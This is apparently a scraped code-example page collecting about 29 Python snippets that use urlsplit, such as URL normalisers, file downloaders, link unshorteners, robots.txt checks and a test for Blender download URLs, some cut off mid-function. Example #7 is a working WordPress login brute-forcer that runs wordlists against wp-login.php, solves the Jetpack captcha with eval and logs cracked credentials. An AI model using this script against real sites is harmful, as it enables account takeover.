Beispiel #1
0
def normalize_url(url, base_url=None):
    """
    Returns a normalized url. If URL scheme is missing the 'file' scheme is set.

    :param url: An relative or absolute URL.
    :param base_url: A reference base URL to join.
    :return: A normalized URL.
    """
    url_parts = urlsplit(url)
    if url_parts.scheme and url_parts.scheme in uses_relative:
        return url_parts.geturl()
    elif base_url is None:
        pathname = os.path.abspath(url_parts.geturl())
        return urljoin(u'file:', pathname2url(pathname))
    else:
        base_url_parts = urlsplit(base_url)
        if base_url_parts.scheme and base_url_parts.scheme in uses_relative:
            return urlunsplit((base_url_parts.scheme, base_url_parts.netloc,
                               os.path.join(base_url_parts.path,
                                            pathname2url(url)),
                               base_url_parts.query, base_url_parts.fragment))
        else:
            pathname = os.path.abspath(os.path.join(base_url, url))
            url_parts = urlsplit(pathname2url(pathname))
            if url_parts.scheme and url_parts.scheme in uses_relative:
                return url_parts.geturl()
            else:
                return urljoin(u'file:', url_parts.geturl())
Beispiel #2
0
def print_some_url(url, return_string=True):
    message = f"hello{pathsep*2}human"
    loc = req.urlsplit(url).netloc
    output = f"{message}, welcome to {loc}"
    print(output)
    if return_string:
        return output
Beispiel #3
0
def load_resource(url):
    """
    Load resource from an URL, decoding into a UTF-8 string.

    :param url: Resource URLs.
    :return: Resource as unicode string ad the loaded URL.
    """
    msg = "cannot load resource from %r: %s"
    try:
        source = urlopen(normalize_url(url))
    except URLError as err:
        raise XMLSchemaURLError(reason=msg % (url, err.reason))
    else:
        try:
            data = source.read()
        except (OSError, IOError) as err:
            raise XMLSchemaOSError(msg % (url, err))
        finally:
            source.close()

    if PY3:
        try:
            return data.decode('utf-8'), url
        except UnicodeDecodeError:
            return data.decode('iso-8859-1'), url
    else:
        try:
            return data.encode('utf-8'), url
        except UnicodeDecodeError:
            import codecs
            with codecs.open(urlsplit(url).path,
                             mode='rb',
                             encoding='iso-8859-1') as text_file:
                return text_file.read().encode('iso-8859-1'), url
Beispiel #4
0
 def wait(self, url):
     domain = urlsplit(url).netloc
     last_accessed = self.domains.get(domain)
     if self.delay > 0 and last_accessed is not None:
         sleep_secs = self.delay - (datetime.now() - last_accessed).seconds
         if sleep_secs > 0:
             time.sleep(sleep_secs)
     self.domains[domain] = datetime.now()
Beispiel #5
0
def query_splitter(url):
	from attrdict import AttrDict
	from collections import OrderedDict
	query = attrgetter('query')(urlsplit(url))
	dic = urlparse(url)._asdict()
	_query = itemgetter('query')(dic)
	print(OrderedDict([q.split('=') for q in _query.split('&')])['text'])
	return AttrDict(OrderedDict([q.split('=') for q in query.split('&')]))
Beispiel #6
0
    def url_to_path(self, url):
        compents = urlsplit(url)
        path = compents.path
        # url目录路径如.com/后面可能是空的
        if not path:
            path = '/index.html'
        elif path.endswith('/'):
            path += 'index.html'

        filename = compents.netloc + path + compents.query
        # 文件名可能包含系统不支持的字符,如* >等符号,需替换掉
        filename = re.sub('[^0-9a-zA-Z\-.,;_]', '_', filename)
        return os.path.join(self.cache_dir, filename)
Beispiel #7
0
 def crack(self):
     print('%s\t[info]%s total site: %d' % (h, p, len(self.site)))
     print('%s\t[info]%s total wordlist u/p: %d' %
           (h, p, min([len(self.a), len(self.b)])))
     for site in self.site:
         requests.headers.update({'user-agent': random.choice(ua)})
         parse = urlsplit(site)
         netloc = parse.netloc
         scheme = parse.scheme
         print('%s[info]%s cracking: %s' % (br, p, netloc))
         for a, b in zip(self.a, self.b):
             try:
                 data = {}
                 url = '%s://%s/wp-login.php' % (scheme, netloc)
                 cek = requests.get(url)
                 if cek.status_code != 200:
                     print('%s[info]%s path wp-login not found ' % (m, p))
                     continue
                 for c, d in re.findall(r'name="(.*?)".*?value="(.*?)"',
                                        cek.text):
                     data.update({c: d})
                 if 'jetpack_protect_num' in cek.text.lower():
                     info = re.findall(r'\n\t\t\t\t\t(.*?)=.*?\t\t\t\t',
                                       cek.text)[0].split(' ')
                     iok = (''.join(info)).replace('x', '*').replace(
                         ' ', '')
                     value = str(eval(iok))
                     print('%s[info]%s User Di Curigai !!!' % (m, p))
                     print('%s[info]%s Bypass chapta %s = %s%s' %
                           (m, p, iok, h, value))
                     data.update({'jetpack_protect_num': value})
                 else:
                     pass
                 data.update({'log': a, 'pwd': b})
                 req = requests.post(url, data=data).text.lower()
                 if 'dashboard' in req:
                     self.v += 1
                     print('    %s[Success] %s: %s > %s , %s' %
                           (h, p, url, a, b))
                     open('found.txt',
                          'a').write(url + '>  %s | %s \n' % (a, b))
                     break
                 else:
                     print('    %s[Failed] %s%s , %s' % (m, p, a, b))
                 continue
             except:
                 print('%s[info] %sError gan ..' % (m, p))
                 continue
     quit('%s[%s@%s]%s selesai total %s save to found.txt' %
          (br, m, br, p, self.v))
Beispiel #8
0
def download(url, path="./"):
    # Check if download dir exists
    if not os.path.isdir(path):
        os.mkdir(path)


    # Download the file from `url` and save it locally under `file_name`:
    split = urlsplit(url)
    file_name = split.path.split("/")[-1]
    path = path + file_name
    if not os.path.isfile(path):
        file_name, headers = urlretrieve(url, path, reporthook=reporthook)
    print("\nDownload complete!")
    return path
Beispiel #9
0
def down_parse_html(url):
    """
    download html and parse it with lxml.html
    :param url: string
    :return: lxml html parsed document
    """
    request = urlopen(Request(url, headers={'User-Agent':
                                                'Mozilla/5.0 (Windows NT 5.1; rv:10.0.1) '
                                                'Gecko/20100101 Firefox/10.0.1'}))
    encoding = request.headers.get_content_charset()
    data = request.read().decode(encoding if encoding else 'utf-8')
    doc = html.fromstring(data)
    doc.make_links_absolute('{0.scheme}://{0.netloc}'.format(urlsplit(url)))
    return doc
Beispiel #10
0
    def __download_file(self, name, libname, url, download_path):
        # try to detect already downloaded file
        (version,
         exists) = self.__detect_existing_download(libname, download_path)

        if not exists:
            # download new local version
            try:
                # urlgrabber follows redirects better than using burllib directly
                local_file = urlgrabber.urlopen(
                    url)  # use urlgrabber to open the url
                actual_url = local_file.url  # detects the actual filename of the redirected url
                values = urlsplit(actual_url)  # split the url up into bits
                filepath = Path(values[2].decode(
                    'UTF-8'))  # part 2 is the file name section of the url
                filename = filepath.name  # just extract the file name.

            except urlgrabber.grabber.URLGrabError as error:
                self.print_message(str(error))

            self.print_message(
                _('Started downloading {}').format(download_path, filename))
            download_file = download_path / filename
            extract_path = self.download_path / name
            extract_path.mkdir(parents=True, exist_ok=True)
            self.__download_remote_file(local_file, download_file)
            self.__decompress(filename, download_file, download_path,
                              extract_path)
            self.print_message(_('Completed download of {}.').format(filename))
        else:
            # check existing local version against download version
            (f_major, f_minor,
             f_build) = self.__detect_library_version(version)
            (d_major, d_minor,
             d_build) = self.__detect_download_version(filename)
            if (d_major > f_major or d_minor > f_minor or d_build > f_build):
                # download replacement if newer
                self.print_message(
                    _('Started downloading {} to replace earlier version').
                    format(download_path, filename))
                download_file = download_path / filename
                extract_path = self.download_path / name
                extract_path.mkdir(parents=True, exist_ok=True)
                self.__download_remote_file(local_file, download_file)
                self.__decompress(filename, download_file, download_path,
                                  extract_path)
                self.print_message(
                    _('Completed download of {} of replacement version.').
                    format(filename))
Beispiel #11
0
    def unshorten(self, uri, type=None, timeout=10):
        domain = urlsplit(uri).netloc
        self._timeout = timeout

        if not domain:
            return uri, INVALID_URL_ERROR_CODE

        if re.search(self._adfly_regex, domain, re.IGNORECASE) or type == 'adfly':
            return self._unshorten_adfly(uri)
        if re.search(self._adfocus_regex, domain, re.IGNORECASE) or type =='adfocus':
            return self._unshorten_adfocus(uri)
        if re.search(self._linkbucks_regex, domain, re.IGNORECASE) or type == 'linkbucks':
            if linkbucks_support:
                return self._unshorten_linkbucks(uri)
            else:
                return uri, 'linkbucks.com not supported. Install selenium package to add support.'
        if re.search(self._lnxlu_regex, domain, re.IGNORECASE) or type == 'lnxlu':
            return self._unshorten_lnxlu(uri)
        if re.search(self._shst_regex, domain, re.IGNORECASE):
            return self._unshorten_shst(uri)
        if re.search(self._hrefli_regex, domain, re.IGNORECASE):
            return self._unshorten_hrefli(uri)
        if re.search(self._anonymz_regex, domain, re.IGNORECASE):
            return self._unshorten_anonymz(uri)

        try:
            # headers stop t.co from working so omit headers if this is a t.co link
            if domain == 't.co':
                r = requests.get(uri, timeout=self._timeout)
                return r.url, r.status_code
            # p.ost.im uses meta http refresh to redirect.
            if domain == 'p.ost.im':
                r = requests.get(uri, headers=self._headers, timeout=self._timeout)
                uri = re.findall(r'.*url\=(.*?)\"\.*',r.text)[0]
                return uri, 200
            try:
                r = requests.head(uri, headers=self._headers, timeout=self._timeout)
            except (requests.exceptions.InvalidSchema, requests.exceptions.InvalidURL):
                return uri, -1
            else:
                while True:
                    if 'location' in r.headers:
                        r = requests.head(r.headers['location'])
                        uri = r.url
                    else:
                        return r.url, r.status_code

        except Exception as e:
            return uri, str(e)
Beispiel #12
0
    def unshorten(self, uri, type=None, timeout=10):
        domain = urlsplit(uri).netloc
        self._timeout = timeout

        if re.search(self._adfly_regex, domain,
                     re.IGNORECASE) or type == 'adfly':
            return self._unshorten_adfly(uri)
        if re.search(self._adfocus_regex, domain,
                     re.IGNORECASE) or type == 'adfocus':
            return self._unshorten_adfocus(uri)
        if re.search(self._linkbucks_regex, domain,
                     re.IGNORECASE) or type == 'linkbucks':
            if linkbucks_support:
                return self._unshorten_linkbucks(uri)
            else:
                return uri, 'linkbucks.com not supported. Install selenium package to add support.'
        if re.search(self._lnxlu_regex, domain,
                     re.IGNORECASE) or type == 'lnxlu':
            return self._unshorten_lnxlu(uri)
        if re.search(self._shst_regex, domain, re.IGNORECASE):
            return self._unshorten_shst(uri)

        try:
            # headers stop t.co from working so omit headers if this is a t.co link
            if domain == 't.co':
                r = requests.get(uri, timeout=self._timeout)
                return r.url, r.status_code
            # p.ost.im uses meta http refresh to redirect.
            if domain == 'p.ost.im':
                r = requests.get(uri,
                                 headers=self._headers,
                                 timeout=self._timeout)
                uri = re.findall(r'.*url\=(.*?)\"\.*', r.text)[0]
                return uri, 200
            r = requests.head(uri,
                              headers=self._headers,
                              timeout=self._timeout)
            while True:
                if 'location' in r.headers:
                    r = requests.head(r.headers['location'])
                    uri = r.url
                else:
                    return r.url, r.status_code

        except Exception as e:
            return uri, str(e)
Beispiel #13
0
    def __init__(self, base, auth=None):
        self.auth = auth
        self.headers = {'User-Agent': 'foobar'}
        self.context = init_ssl()
        self.jar = CookieJar()
        split = urlsplit(base)
        self.base = '{}://{}'.format(split.scheme, split.netloc)

        if self.auth:
            auth = ':'.join(self.auth)
            if sys.version_info >= (3,):
                basic = base64.b64encode(auth.encode('ascii')).decode('ascii')
            else:
                basic = base64.b64encode(auth)
            self.headers['Authorization'] = 'Basic {}'.format(basic)

        self._get_crumb()
Beispiel #14
0
 def connect(url: str) -> tuple:
     """
     Connect to the given url and extract the html.\n
     :param url:
     """
     year = urlsplit(url).netloc.split('.')[0]
     try:
         headers = dict()
         headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 " \
                                 "(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
         req = urllib.request.Request(url, headers=headers)
         with urllib.request.urlopen(req) as response:
             page = codecs.decode(response.read())
         return page, int(year)
     except urllib.request.URLError as e:
         print(f"The following error had raise while trying to connect to {url}\n")
         print(e)
         sys.exit()
Beispiel #15
0
def isNeededUrl(url):
    neededUrl = True
    fileName =  (((urlsplit(url).path).lower()).split("/"))[-1]
    if(fileName in comm.undesiredFileName):
        neededUrl = False
    if(neededUrl):        
        extSplit = (fileName.split("."))
        lastIndex = len(extSplit)-1
        if(lastIndex > 0):
            extension = (extSplit[lastIndex])
            if(extension in comm.undesiredFileExtensions):
                neededUrl = False
    if(neededUrl):
        for udft in comm.undesiredFileTypes:
            if(udft in url):
                neededUrl = False
                break
    return neededUrl
Beispiel #16
0
def checkcrolling(url):
    urlspli = request.urlsplit(url)
    netloc = urlspli.netloc
    path = urlspli.path
    robots = urlspli.scheme + "://" + netloc + "/robots.txt"
    response = request.urlopen(robots)
    wrapper = io.TextIOWrapper(response, 'utf-8')
    read = wrapper.read()
    if read.startswith("User-agent"):
        disallowlist = [
            string[string.index(":") + 1::].strip(" ")
            for string in read.split("\n") if string.startswith("Disallow")
        ]
        disallowlist.append("/")
        if "/" in disallowlist:
            return False
        return path in disallowlist
    else:
        return False
Beispiel #17
0
	def redirected(self, req, fp, code, msg, headers):
		note.yellow("being redirected",code,msg,headers.get("location"))
		note(headers)
		if 'set-cookie' in headers:
			import time
			parts = headers['set-cookie'].split(";")
			n,v = parts[0].split("=",1)
			url = urllib.urlsplit(req.url)
			c = {
				'name': n.strip(),
				'value': v.strip(),
				'domain': split_port(url.netloc)[1],
				'creationTime': time.time()
			}
			for part in parts[1:]:
				part = part.split("=",1)
				if len(part) == 1:
					c[part[0].strip] = True
				else:
					c[part[0].strip()] = part[1].strip()
			jar.set_cookie(c)
Beispiel #18
0
    def unshorten(self, uri, type=None, timeout=10):
        domain = urlsplit(uri).netloc
        self._timeout = timeout

        if re.search(self._adfly_regex, domain, re.IGNORECASE) or type == "adfly":
            return self._unshorten_adfly(uri)
        if re.search(self._adfocus_regex, domain, re.IGNORECASE) or type == "adfocus":
            return self._unshorten_adfocus(uri)
        if re.search(self._linkbucks_regex, domain, re.IGNORECASE) or type == "linkbucks":
            if linkbucks_support:
                return self._unshorten_linkbucks(uri)
            else:
                return uri, "linkbucks.com not supported. Install selenium package to add support."
        if re.search(self._lnxlu_regex, domain, re.IGNORECASE) or type == "lnxlu":
            return self._unshorten_lnxlu(uri)
        if re.search(self._shst_regex, domain, re.IGNORECASE):
            return self._unshorten_shst(uri)

        try:
            # headers stop t.co from working so omit headers if this is a t.co link
            if domain == "t.co":
                r = requests.get(uri, timeout=self._timeout)
                return r.url, r.status_code
            # p.ost.im uses meta http refresh to redirect.
            if domain == "p.ost.im":
                r = requests.get(uri, headers=self._headers, timeout=self._timeout)
                uri = re.findall(r".*url\=(.*?)\"\.*", r.text)[0]
                return uri, 200
            r = requests.head(uri, headers=self._headers, timeout=self._timeout)
            while True:
                if "location" in r.headers:
                    r = requests.head(r.headers["location"])
                    uri = r.url
                else:
                    return r.url, r.status_code

        except Exception as e:
            return uri, str(e)
Beispiel #19
0
def url2name(url):
    return basename(urlsplit(url)[2])
Beispiel #20
0
from tqdm import tqdm

import aigym.dataset
from aigym.conf.settings import RAW_DATASETS_DIR

arg_parser = ArgumentParser('aigym.dataset')
arg_parser.add_argument('-download',
                        metavar='url',
                        help="download dataset file from url")
arg_parser.add_argument('-prepare',
                        metavar='dataset name',
                        help="prepares dataset specified by name")

parsed_args = arg_parser.parse_args()

if parsed_args.download:
    source = urlopen(parsed_args.download)
    filename = os.path.split(urlsplit(parsed_args.download).path)[-1]
    with open(os.path.join(RAW_DATASETS_DIR, filename), 'wb') as file:
        for byte in tqdm(source.read(),
                         desc='Downloading from {}'.format(
                             parsed_args.download)):
            file.write(pack('B', byte))

if parsed_args.prepare:
    cls = getattr(aigym.dataset,
                  "{}RawDataset".format(parsed_args.prepare.title()), None)
    if cls is not None:
        cls().prepare()
Beispiel #21
0
 def basename(self) -> str:
     return Path(request.urlsplit(self._url)[2]).name
FILE
    c:\python37\lib\urllib\__init__.py


>>> import urllib2
Traceback (most recent call last):
  File "<pyshell#10>", line 1, in <module>
    import urllib2
ModuleNotFoundError: No module named 'urllib2'
>>> import urllib.request as request
>>> dir(request)
['AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler', 'ContentTooShortError', 'DataHandler', 'FTPHandler', 'FancyURLopener', 'FileHandler', 'HTTPBasicAuthHandler', 'HTTPCookieProcessor', 'HTTPDefaultErrorHandler', 'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor', 'HTTPHandler', 'HTTPPasswordMgr', 'HTTPPasswordMgrWithDefaultRealm', 'HTTPPasswordMgrWithPriorAuth', 'HTTPRedirectHandler', 'HTTPSHandler', 'MAXFTPCACHE', 'OpenerDirector', 'ProxyBasicAuthHandler', 'ProxyDigestAuthHandler', 'ProxyHandler', 'Request', 'URLError', 'URLopener', 'UnknownHandler', '__all__', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', '__version__', '_cut_port_re', '_ftperrors', '_have_ssl', '_localhost', '_noheaders', '_opener', '_parse_proxy', '_proxy_bypass_macosx_sysconf', '_randombytes', '_safe_gethostbyname', '_thishost', '_url_tempfiles', 'addclosehook', 'addinfourl', 'base64', 'bisect', 'build_opener', 'contextlib', 'email', 'ftpcache', 'ftperrors', 'ftpwrapper', 'getproxies', 'getproxies_environment', 'getproxies_registry', 'hashlib', 'http', 'install_opener', 'io', 'localhost', 'noheaders', 'os', 'parse_http_list', 'parse_keqv_list', 'pathname2url', 'posixpath', 'proxy_bypass', 'proxy_bypass_environment', 'proxy_bypass_registry', 'quote', 're', 'request_host', 'socket', 'splitattr', 'splithost', 'splitpasswd', 'splitport', 'splitquery', 'splittag', 'splittype', 'splituser', 'splitvalue', 'ssl', 'string', 'sys', 'tempfile', 'thishost', 'time', 'to_bytes', 'unquote', 'unquote_to_bytes', 'unwrap', 'url2pathname', 'urlcleanup', 'urljoin', 'urlopen', 'urlparse', 'urlretrieve', 'urlsplit', 'urlunparse', 'warnings']
>>> dir(urllib.response)
['__all__', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'addbase', 'addclosehook', 'addinfo', 'addinfourl', 'tempfile']
>>> url = "https://www.google.com"
>>> sp = request.urlsplit()
Traceback (most recent call last):
  File "<pyshell#15>", line 1, in <module>
    sp = request.urlsplit()
TypeError: urlsplit() missing 1 required positional argument: 'url'
>>> sp = request.urlsplit(url)
>>> sp
SplitResult(scheme='https', netloc='www.google.com', path='', query='', fragment='')
>>> sp[0]
'https'
>>> sp[1]
'www.google.com'
>>> sp[2]
''
>>> url1="https://stackoverflow.com/questions/34475051/need-to-install-urllib2-for-python-3-5-1"
>>> sp = request.urlsplit(url1)
Beispiel #23
0
def test_get_legacy_release_download_url(blender_version, operative_system,
                                         bits, arch):
    blender_Version = BlenderVersion(blender_version)

    if blender_Version < BlenderVersion(MINIMUM_VERSION_SUPPPORTED):
        mocked_stderr = io.StringIO()
        with pytest.raises(SystemExit):
            with contextlib.redirect_stderr(mocked_stderr):
                get_legacy_release_download_url(blender_version,
                                                operative_system, bits, arch)
        assert mocked_stderr.getvalue() == (
            "The minimum version supported by blender-downloader is"
            f" {MINIMUM_VERSION_SUPPPORTED}.\n")
        return

    url = get_legacy_release_download_url(blender_version, operative_system,
                                          bits, arch)

    expected_url_start = "https://download.blender.org/release/Blender"
    assert url.startswith(expected_url_start)

    major_minor_blender_version = re.sub(
        r"[a-zA-Z]", "", ".".join(blender_version.split(".")[:2]))

    def assert_url(url_end_schema):
        url_end = url_end_schema
        if "{blender_version}" in url_end:
            if "{bits}" in url_end:
                url_end = url_end.format(
                    blender_version=blender_version,
                    bits=bits,
                )
            else:
                url_end = url_end.format(blender_version=blender_version)
        if "{bits}" in url_end:
            url_end = url_end.format(bits=bits)
        assert url == (
            f"{expected_url_start}{major_minor_blender_version}/blender-{url_end}"
        )

    if operative_system == "macos":
        if blender_Version >= BlenderVersion("2.93"):
            if arch in ["x64", "arm64"]:
                assert_url(f"{blender_version}-macos-{arch}.dmg")
            else:
                assert_url("{blender_version}-macos-x64.dmg")
        elif blender_Version >= BlenderVersion(
                "2.83.14") and blender_Version < BlenderVersion("2.84"):
            assert_url("{blender_version}-macos-x64.dmg")
        elif blender_Version > BlenderVersion("2.79"):
            assert_url("{blender_version}-macOS.dmg")
        elif blender_Version == BlenderVersion("2.79"):
            assert_url("{blender_version}-macOS-10.6.tar.gz")
        elif blender_Version == BlenderVersion("2.71"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.6-j2k-fix-i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6-j2k-fix-x86_64.zip")
        elif blender_Version < BlenderVersion("2.60"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.5_i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.5_x86_64.zip")
        elif blender_Version == BlenderVersion("2.60"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.5_i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6_x86_64.zip")
        elif blender_Version < BlenderVersion("2.64"):
            if bits == 32:
                assert_url("{blender_version}-release-OSX_10.5_i386.zip")
            else:
                assert_url("{blender_version}-release-OSX_10.5_x86_64.zip")
        elif blender_Version < BlenderVersion("2.65"):
            if bits == 32:
                assert_url("{blender_version}-release-OSX_10.6_i386.zip")
            else:
                assert_url("{blender_version}-release-OSX_10.6_x86_64.zip")

        elif blender_Version < BlenderVersion("2.71"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.6-i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6-x86_64.zip")
        elif blender_Version < BlenderVersion("2.79"):
            assert_url("{blender_version}-OSX_10.6-x86_64.zip")
        else:  # BlenderVersion("2.71") < blender_Version < BlenderVersion("2.79")
            if bits == 32:
                assert_url("{blender_version}-OSX_10.6-i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6-x86_64.zip")
    elif operative_system == "windows":
        if blender_Version >= BlenderVersion("2.93"):
            assert_url("{blender_version}-windows-x64.zip")
        elif blender_Version >= BlenderVersion(
                "2.83.14") and blender_Version < BlenderVersion("2.84"):
            assert_url("{blender_version}-windows-x64.zip")
        elif blender_Version > BlenderVersion("2.80"):
            assert_url("{blender_version}-windows64.zip")
        elif blender_Version > BlenderVersion("2.65"):
            assert_url("{blender_version}-windows{bits}.zip")
        elif blender_Version > BlenderVersion("2.60"):
            assert_url("{blender_version}-release-windows{bits}.zip")
        else:  # blender_Version < BlenderVersion("2.61")
            assert_url("{blender_version}-windows{bits}.zip")
    else:  # operative_system == "linux":
        if blender_Version >= BlenderVersion("2.93"):
            assert_url("{blender_version}-linux-x64.tar.xz")
        elif blender_Version >= BlenderVersion(
                "2.83.14") and blender_Version < BlenderVersion("2.84"):
            assert_url("{blender_version}-linux-x64.tar.xz")
        elif blender_Version > BlenderVersion("2.81"):
            assert_url("{blender_version}-linux64.tar.xz")
        elif blender_Version == BlenderVersion("2.81"):
            assert_url("{blender_version}-linux-glibc217-x86_64.tar.bz2")
        elif blender_Version == BlenderVersion("2.80"):
            if bits == 32:
                assert_url("{blender_version}-linux-glibc224-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc217-x86_64.tar.bz2")
        elif blender_Version == BlenderVersion("2.79"):
            if bits == 32:
                assert_url("{blender_version}-linux-glibc219-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc219-x86_64.tar.bz2")
        elif blender_Version < BlenderVersion("2.65"):
            if bits == 32:
                assert_url("{blender_version}-linux-glibc27-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc27-x86_64.tar.bz2")
        else:  # BlenderVersion("2.64") < blender_Version < BlenderVersion("2.79")
            if bits == 32:
                assert_url("{blender_version}-linux-glibc211-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc211-x86_64.tar.bz2")

    # check that filetype is supported for extraction
    extension = os.path.splitext(os.path.basename(urlsplit(url).path))[1]
    assert extension in SUPPORTED_EXTENSIONS_FOR_EXTRACTION
Beispiel #24
0
            return True
        if self.index > other.index:
            return True
        return False

    def __eq__(self, other):
        if self.index == other.index:
            return True


file_info_list = []
input_json = input()
parsed_json = json.loads(input_json)
i = 0

for element in parsed_json:
    url = element["url"]
    split_result = request.urlsplit(url)
    file_name = split_result[2]
    if file_name == "/":
        file_name = "index.html"
    file_info_list.append(FileInfo(url, file_name, i))
    i += 1

file_info_list.sort()
password = ""
for file_info in file_info_list:
    password += file_info.md5

print(password)
import requests
from bs4 import BeautifulSoup
from urllib.request import urlsplit

general = 'https://afteegypt.org/blocked-websites-list?lang=en'
afteegypt = requests.get(general)
parse = BeautifulSoup(afteegypt.content, "html5lib")

blocked_websties = []

for table in parse.find_all('table'):

    for tr in table.findAll('tr', attrs={'style': 'height: 26px;'}):
        for anchor in tr.findAll('a'):
            url = urlsplit(anchor.get('href')).netloc
            blocked_websties.append(url)

    # Second half of the tables
    for td1 in table.findAll(
            'td',
            attrs=
        {
            'style':
            'background-color: #faf2f2; text-align: center; height: 26px; width: 214px;',
            'colspan': '2'
        }):
        v = td1.renderContents()
        for x in str(v.decode('utf-8')).replace('<br/>', '').split():
            blocked_websties.append(x)

    # First half of the tables
Beispiel #26
0
            return True
        if self.index > other.index:
            return True
        return False

    def __eq__(self, other):
        if self.index == other.index:
            return True


file_info_list = []
input_json = input()
parsed_json = json.loads(input_json)
i = 0

for element in parsed_json:
    url = element["url"]
    split_result = request.urlsplit(url)
    file_name = split_result[2]
    if file_name == "/":
        file_name = "index.html"
    file_info_list.append(FileInfo(url, file_name, i))
    i += 1

file_info_list.sort()
password = ""
for file_info in file_info_list:
    password += file_info.md5

print(password)
Beispiel #27
0
 def normalize(uri):
     return urlsplit(uri).geturl()
Beispiel #28
0
def download_release(download_url, output_directory, quiet=False):
    """Downloads the release file from Blender official repository.

    Parameters
    ----------

    download_url : str
      URL of the file to download.

    output_directory : str
      Path to the directory in which the downloaded file will be stored.
    """
    try:
        # get filename of downloaded file (maybe a zip, maybe a dmg...)
        output_filename = os.path.basename(urlsplit(download_url).path)
        output_filepath = os.path.join(output_directory, output_filename)

        if os.path.isfile(output_filepath):
            sys.stderr.write(
                f"There is already a file named as '{output_filename}' in the"
                " directory in which Blender will be downloaded.\nPlease, remove"
                " the file before execute blender-downloader.\n")
            sys.exit(1)

        # create temporal blender-downloader directory if not exists to store
        # extracted files
        if not os.path.isdir(TEMPDIR):
            os.mkdir(TEMPDIR)

        tmp_output_filepath = os.path.join(TEMPDIR, output_filename)

        chunksize = 8192
        downloaded_size = chunksize
        res = urlopen(Request(download_url))
        total_size_bits = int(res.info()["Content-Length"])

        progress_bar_kwargs = dict(
            total=total_size_bits,
            unit="B",
            desc=f"Downloading '{output_filename}'",
            unit_scale=True,
            unit_divisor=1000,
            miniters=1,
            disable=quiet,
            initial=chunksize,  # first chunk is written before entering while
        )
        with tqdm(**progress_bar_kwargs) as progress_bar, open(
                tmp_output_filepath, "wb") as f:
            data = res.read(chunksize)
            f.write(data)
            while data:
                data = res.read(chunksize)
                f.write(data)
                progress_bar.update(chunksize)
                downloaded_size += chunksize
                if downloaded_size >= total_size_bits:
                    break
    except KeyboardInterrupt:
        sys.stderr.write("Download interrupted\n")
        if os.path.isfile(tmp_output_filepath):
            os.remove(tmp_output_filepath)
        sys.exit(1)

    # move from temporal directory to the real output path
    os.rename(tmp_output_filepath, output_filepath)

    return output_filepath
Beispiel #29
0
from urllib import request
import io

url = "http://www.daum.net/robots.txt"
response = request.urlopen(url)
string = request.urlsplit(url)
print(response)
aa = io.TextIOWrapper(response, 'utf-8')
bb = aa.read()
print(bb.startswith("User-agent"))
list = [
    string[string.index(":") + 1::].strip(" ") for string in bb.split("\n")
    if string.startswith("Disallow")
]

print(list)


def checkcrolling(url):
    urlspli = request.urlsplit(url)
    netloc = urlspli.netloc
    path = urlspli.path
    robots = urlspli.scheme + "://" + netloc + "/robots.txt"
    response = request.urlopen(robots)
    wrapper = io.TextIOWrapper(response, 'utf-8')
    read = wrapper.read()
    if read.startswith("User-agent"):
        disallowlist = [
            string[string.index(":") + 1::].strip(" ")
            for string in read.split("\n") if string.startswith("Disallow")
        ]